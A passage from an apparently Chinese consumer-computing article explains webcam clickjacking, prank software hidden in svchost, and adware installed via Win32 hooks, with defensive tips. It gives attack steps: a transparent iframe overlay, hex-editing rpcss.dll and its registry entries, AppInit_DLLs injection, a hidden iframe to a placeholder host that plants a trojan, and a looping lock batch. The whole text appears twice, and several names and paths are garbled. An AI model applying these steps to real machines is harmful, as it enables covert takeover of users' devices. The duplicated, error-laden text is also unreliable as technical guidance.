论文部分内容阅读
当你回忆这段时间发生的事的时候,你是否觉得近来电脑有一点怪?其实你并不是唯一的一个。近来,一些人碰到了更为奇怪的事情:“正在上网,突然处于关闭状态的摄像头自动开启了;安装软件过程中突然装起了另一软件,鼠标、键盘一起动都阻止不了;凌晨,电脑自动开机,传来张震讲故事的声音……”这些近似“灵异”的事情都在不断发生,它们的背后到底隐藏着怎样的故事呢?
自动“睁眼”的摄像头
场景回放:
一天,小琳在玩网页游戏,杀毒软件无报警,360防火墙也无危险提示的情况下,自己玩游戏用的摄像头忽然自动开启了。启动杀毒软件,全盘扫描后,发现并没有木马程序,小琳愈发感到奇怪和紧张。
技术揭秘:
要说这个事情,还要从小琳的动作说起,当小琳点击一个按钮的时候,本来点击的是“1”,但是在后台,这个数据被修改成“2”后再传给电脑,这也就是大家现在在网站上常看到的Clickjacking(点击劫持)。这是浏览器工作原理中的一个缺陷,一个恶意FLASH就能让小琳在毫不知情的情况下点击任意链接、任意按钮或网站上的任意东西。小琳所做的任何点击都可以被引导到恶意链接上。黑客利用Clickjacking漏洞构造一个恶意网页,例如Flash小游戏,当用户不慎访问该网页时,正常鼠标点击操作就会触发这一漏洞。黑客可以在用户毫不知情的情况下,强制启动并完全控制摄像头和麦克风。
实例分析:
这种劫持的发生,一般经历了以下的步骤。
第一步:黑客在第三方站点的网页先在可控制的页面A内设置一个iFrame(见图1),iFrame的src链接指向另一个域的页面B。设置这个iFrame的CSS样式的透明度为0,并设置其CSS样式的z-index比页面A的其他元素的z-index大(z-index属性指定元素的堆叠顺序,拥有更高堆叠顺序的元素总是会处于堆叠顺序较低的元素的前面)。
(1)
第二步:将这个iFrame的Width(宽)与Height(高)值被设置为足以保证用户点击到其中内容(页面B的内容)的大小,然后在页面A上放置一些按钮、链接用于欺骗用户点击的元素,这些元素在iFrame之下,并恰好与iFrame的页面B内的关键元素在同一个位置。
这样,当用户被欺骗去点击页面A内的这些元素时,实际上点击了页面B内的关键元素。通过Clickjacking漏洞,攻击者可以控制用户的浏览器,诱骗用户点击任意链接、按钮或者网上任意的东西。
防御技巧:
1.在浏览器中打开http://www.adobe.com/support/documentation/en/flashplayer/help/settings_manager02.html,进入全球个人Adobe Flash Player设置管理模板页面。单击设置管理器界面的“始终拒绝”按钮,并在随后弹出的结果对话框中选择“确认”(见图2)。
(2)
2.我们可以到Adobe官方网站下载Flash Player的最新版本,但在安装之前必须先从系统中将已经安装的Adobe Flash Player全部删除。另外,还有一些第三方的工具可以方便使用。
开机后响起的“鬼故事”
场景回放:凌晨2点,小正忽然发现自己床头的计算机自动开启了,在开机后操作鼠标、键盘不能动,音响里缓缓传来张震讲故事的声音。小正被吓得一下子蹦离了电脑,回过神来,小正感觉一定是中了木马,但检查启动项、进程、system32目录都未发现异常,再次重启电脑后发现居然自动开始播放张震鬼故事第二部,恐怖的气息围绕在小正的身边。
技术揭秘:
小正遇到的现象其实是某些恶作剧软件造成的,这类软件大多会利用主板的网卡自动开机功能启动,并在进入操作系统后进行恶作剧。由于软件采用DLL插入系统服务scvhost.exe中,修改系统时间开机时间并将自身隐藏在svchost.exe中作案,因此很难被发现。
(3)
小提示:svchost.exe进程运行原理
以Windows XP为例,在“开始”菜单的“运行”窗口中输入“services.msc”命令,弹出服务对话框,然后打开“remote procedure call”属性对话框,可以看到rpcss服务的可执行文件的路径为“c:\windows\system32\svchost -k rpcss”,这说明rpcss服务是依靠svchost调用“rpcss”参数来实现的,而参数的内容则是存放在系统注册表中的。
实例分析:
恶作剧软件也可以利用上述过程构造一个合法的svchost服务(见图3),程序利用scvhost.exe服务调整网卡的自动开机设置(常见的TP-LINK8139网卡需要主板支持),并调用需要播放的MP3播放列表实现开机自动播放。我们来拿一个rpcss服务调用做演示:
第一步:首先在运行对话框中输入“regedit.exe”后回车,打开注册表编辑器,找到[hkey_local_machine /system/currentcontrolset/services/rpcss]项,找到类型为“reg_expand_sz”的键“magepath”,其键值为“%systemroot%system32svchost -k rpcss”(这就是在服务窗口中看到的服务启动命令)。
第二步:在“parameters”子项中有个名为“servicedll”的键,其值为“%systemroot%system32rpcss.dll”,其中“rpcss.dll”就是rpcss服务要使用的动态链接库文件。这样svchost进程通过读取“rpcss”服务注册表信息,就能启动该服务了。
我们将张震讲故事的MP3列表利用16进制编辑器写入到“rpcss.dll”中(注意对rpcss.dll备份)。这里经过修改的“rpcss.dll”就可以实现开机自动调用MP3文件了。完成操作后,svchost进程通过读取“rpcss”服务注册表信息,就能启动该服务并自动讲鬼故事了。
无法控制的程序安装
场景回放:某个晚上,小明正在电脑前看最新的体育新闻,忽然电脑重新启动了,再次进入操作系统,发现计算机中多了几个程序和相应的进程。小明感到非常迷惑:“中病毒了?我的计算机刚做的操作系统,就算有病毒程序,也不能自动重启计算机啊?”
技术揭秘:自动安装的程序多数为宣传广告与种植木马,此类程序在运行后利用WIN32的挂钩(Hook)技术插入DLL,由于程序调用了SetWindowsHookEx函数(也是一个Win32 API函数),实现无选择性自动安装。
实例分析:
第一步:流氓软件在运行时通过修改注册表中的[HKEY_LOCAL_MACHINE/Software/Microsoft/Windows NT/CurrentVersion/Windows/AppInit_DLLs]来达到插入进程。然后将需要安装的程序与一个正常软件捆绑(如:winamp播放器),程序自动调用了API开始同时执行流氓软件。
第二步:当正常的软件完成安装后,流氓软件通过Hook技术检测系统所有程序进程的相关API调用,由于“任务管理器”调用了EnumProcesses等进程相关的API函数,因此流氓程序就可以接收到发出调用请求程序的返回结果,并进行处理,当处理完成后,计算机会自动重新启动来完成设置,而我们从始至终并没有任何机会去进行选择。
小提示:
我们来分析一下程序在计算机上的安装过程:首先利用IE浏览器漏洞,将木马程序利用<iframe src=http://www.xxx.cn/b3.htm width=50 height=0 border=0>种植入计算机。木马运行后在本地执行一个批处理命令:
lock
rundll32.exe user32.dll,LockWorkStation
Goto start (自动加载执行rundll32),然后实现全自动种植安装。
防御技巧:1.利用冰刃类第三方辅助程序分析HOOK,删除流氓插件。2.安装HIPS类防御软件,禁止调用“%windir%”类指令。
自动“睁眼”的摄像头
场景回放:
一天,小琳在玩网页游戏,杀毒软件无报警,360防火墙也无危险提示的情况下,自己玩游戏用的摄像头忽然自动开启了。启动杀毒软件,全盘扫描后,发现并没有木马程序,小琳愈发感到奇怪和紧张。
技术揭秘:
要说这个事情,还要从小琳的动作说起,当小琳点击一个按钮的时候,本来点击的是“1”,但是在后台,这个数据被修改成“2”后再传给电脑,这也就是大家现在在网站上常看到的Clickjacking(点击劫持)。这是浏览器工作原理中的一个缺陷,一个恶意FLASH就能让小琳在毫不知情的情况下点击任意链接、任意按钮或网站上的任意东西。小琳所做的任何点击都可以被引导到恶意链接上。黑客利用Clickjacking漏洞构造一个恶意网页,例如Flash小游戏,当用户不慎访问该网页时,正常鼠标点击操作就会触发这一漏洞。黑客可以在用户毫不知情的情况下,强制启动并完全控制摄像头和麦克风。
实例分析:
这种劫持的发生,一般经历了以下的步骤。
第一步:黑客在第三方站点的网页先在可控制的页面A内设置一个iFrame(见图1),iFrame的src链接指向另一个域的页面B。设置这个iFrame的CSS样式的透明度为0,并设置其CSS样式的z-index比页面A的其他元素的z-index大(z-index属性指定元素的堆叠顺序,拥有更高堆叠顺序的元素总是会处于堆叠顺序较低的元素的前面)。
(1)
第二步:将这个iFrame的Width(宽)与Height(高)值被设置为足以保证用户点击到其中内容(页面B的内容)的大小,然后在页面A上放置一些按钮、链接用于欺骗用户点击的元素,这些元素在iFrame之下,并恰好与iFrame的页面B内的关键元素在同一个位置。
这样,当用户被欺骗去点击页面A内的这些元素时,实际上点击了页面B内的关键元素。通过Clickjacking漏洞,攻击者可以控制用户的浏览器,诱骗用户点击任意链接、按钮或者网上任意的东西。
防御技巧:
1.在浏览器中打开http://www.adobe.com/support/documentation/en/flashplayer/help/settings_manager02.html,进入全球个人Adobe Flash Player设置管理模板页面。单击设置管理器界面的“始终拒绝”按钮,并在随后弹出的结果对话框中选择“确认”(见图2)。
(2)
2.我们可以到Adobe官方网站下载Flash Player的最新版本,但在安装之前必须先从系统中将已经安装的Adobe Flash Player全部删除。另外,还有一些第三方的工具可以方便使用。
开机后响起的“鬼故事”
场景回放:凌晨2点,小正忽然发现自己床头的计算机自动开启了,在开机后操作鼠标、键盘不能动,音响里缓缓传来张震讲故事的声音。小正被吓得一下子蹦离了电脑,回过神来,小正感觉一定是中了木马,但检查启动项、进程、system32目录都未发现异常,再次重启电脑后发现居然自动开始播放张震鬼故事第二部,恐怖的气息围绕在小正的身边。
技术揭秘:
小正遇到的现象其实是某些恶作剧软件造成的,这类软件大多会利用主板的网卡自动开机功能启动,并在进入操作系统后进行恶作剧。由于软件采用DLL插入系统服务scvhost.exe中,修改系统时间开机时间并将自身隐藏在svchost.exe中作案,因此很难被发现。
(3)
小提示:svchost.exe进程运行原理
以Windows XP为例,在“开始”菜单的“运行”窗口中输入“services.msc”命令,弹出服务对话框,然后打开“remote procedure call”属性对话框,可以看到rpcss服务的可执行文件的路径为“c:\windows\system32\svchost -k rpcss”,这说明rpcss服务是依靠svchost调用“rpcss”参数来实现的,而参数的内容则是存放在系统注册表中的。
实例分析:
恶作剧软件也可以利用上述过程构造一个合法的svchost服务(见图3),程序利用scvhost.exe服务调整网卡的自动开机设置(常见的TP-LINK8139网卡需要主板支持),并调用需要播放的MP3播放列表实现开机自动播放。我们来拿一个rpcss服务调用做演示:
第一步:首先在运行对话框中输入“regedit.exe”后回车,打开注册表编辑器,找到[hkey_local_machine /system/currentcontrolset/services/rpcss]项,找到类型为“reg_expand_sz”的键“magepath”,其键值为“%systemroot%system32svchost -k rpcss”(这就是在服务窗口中看到的服务启动命令)。
第二步:在“parameters”子项中有个名为“servicedll”的键,其值为“%systemroot%system32rpcss.dll”,其中“rpcss.dll”就是rpcss服务要使用的动态链接库文件。这样svchost进程通过读取“rpcss”服务注册表信息,就能启动该服务了。
我们将张震讲故事的MP3列表利用16进制编辑器写入到“rpcss.dll”中(注意对rpcss.dll备份)。这里经过修改的“rpcss.dll”就可以实现开机自动调用MP3文件了。完成操作后,svchost进程通过读取“rpcss”服务注册表信息,就能启动该服务并自动讲鬼故事了。
无法控制的程序安装
场景回放:某个晚上,小明正在电脑前看最新的体育新闻,忽然电脑重新启动了,再次进入操作系统,发现计算机中多了几个程序和相应的进程。小明感到非常迷惑:“中病毒了?我的计算机刚做的操作系统,就算有病毒程序,也不能自动重启计算机啊?”
技术揭秘:自动安装的程序多数为宣传广告与种植木马,此类程序在运行后利用WIN32的挂钩(Hook)技术插入DLL,由于程序调用了SetWindowsHookEx函数(也是一个Win32 API函数),实现无选择性自动安装。
实例分析:
第一步:流氓软件在运行时通过修改注册表中的[HKEY_LOCAL_MACHINE/Software/Microsoft/Windows NT/CurrentVersion/Windows/AppInit_DLLs]来达到插入进程。然后将需要安装的程序与一个正常软件捆绑(如:winamp播放器),程序自动调用了API开始同时执行流氓软件。
第二步:当正常的软件完成安装后,流氓软件通过Hook技术检测系统所有程序进程的相关API调用,由于“任务管理器”调用了EnumProcesses等进程相关的API函数,因此流氓程序就可以接收到发出调用请求程序的返回结果,并进行处理,当处理完成后,计算机会自动重新启动来完成设置,而我们从始至终并没有任何机会去进行选择。
小提示:
我们来分析一下程序在计算机上的安装过程:首先利用IE浏览器漏洞,将木马程序利用<iframe src=http://www.xxx.cn/b3.htm width=50 height=0 border=0>种植入计算机。木马运行后在本地执行一个批处理命令:
lock
rundll32.exe user32.dll,LockWorkStation
Goto start (自动加载执行rundll32),然后实现全自动种植安装。
防御技巧:1.利用冰刃类第三方辅助程序分析HOOK,删除流氓插件。2.安装HIPS类防御软件,禁止调用“%windir%”类指令。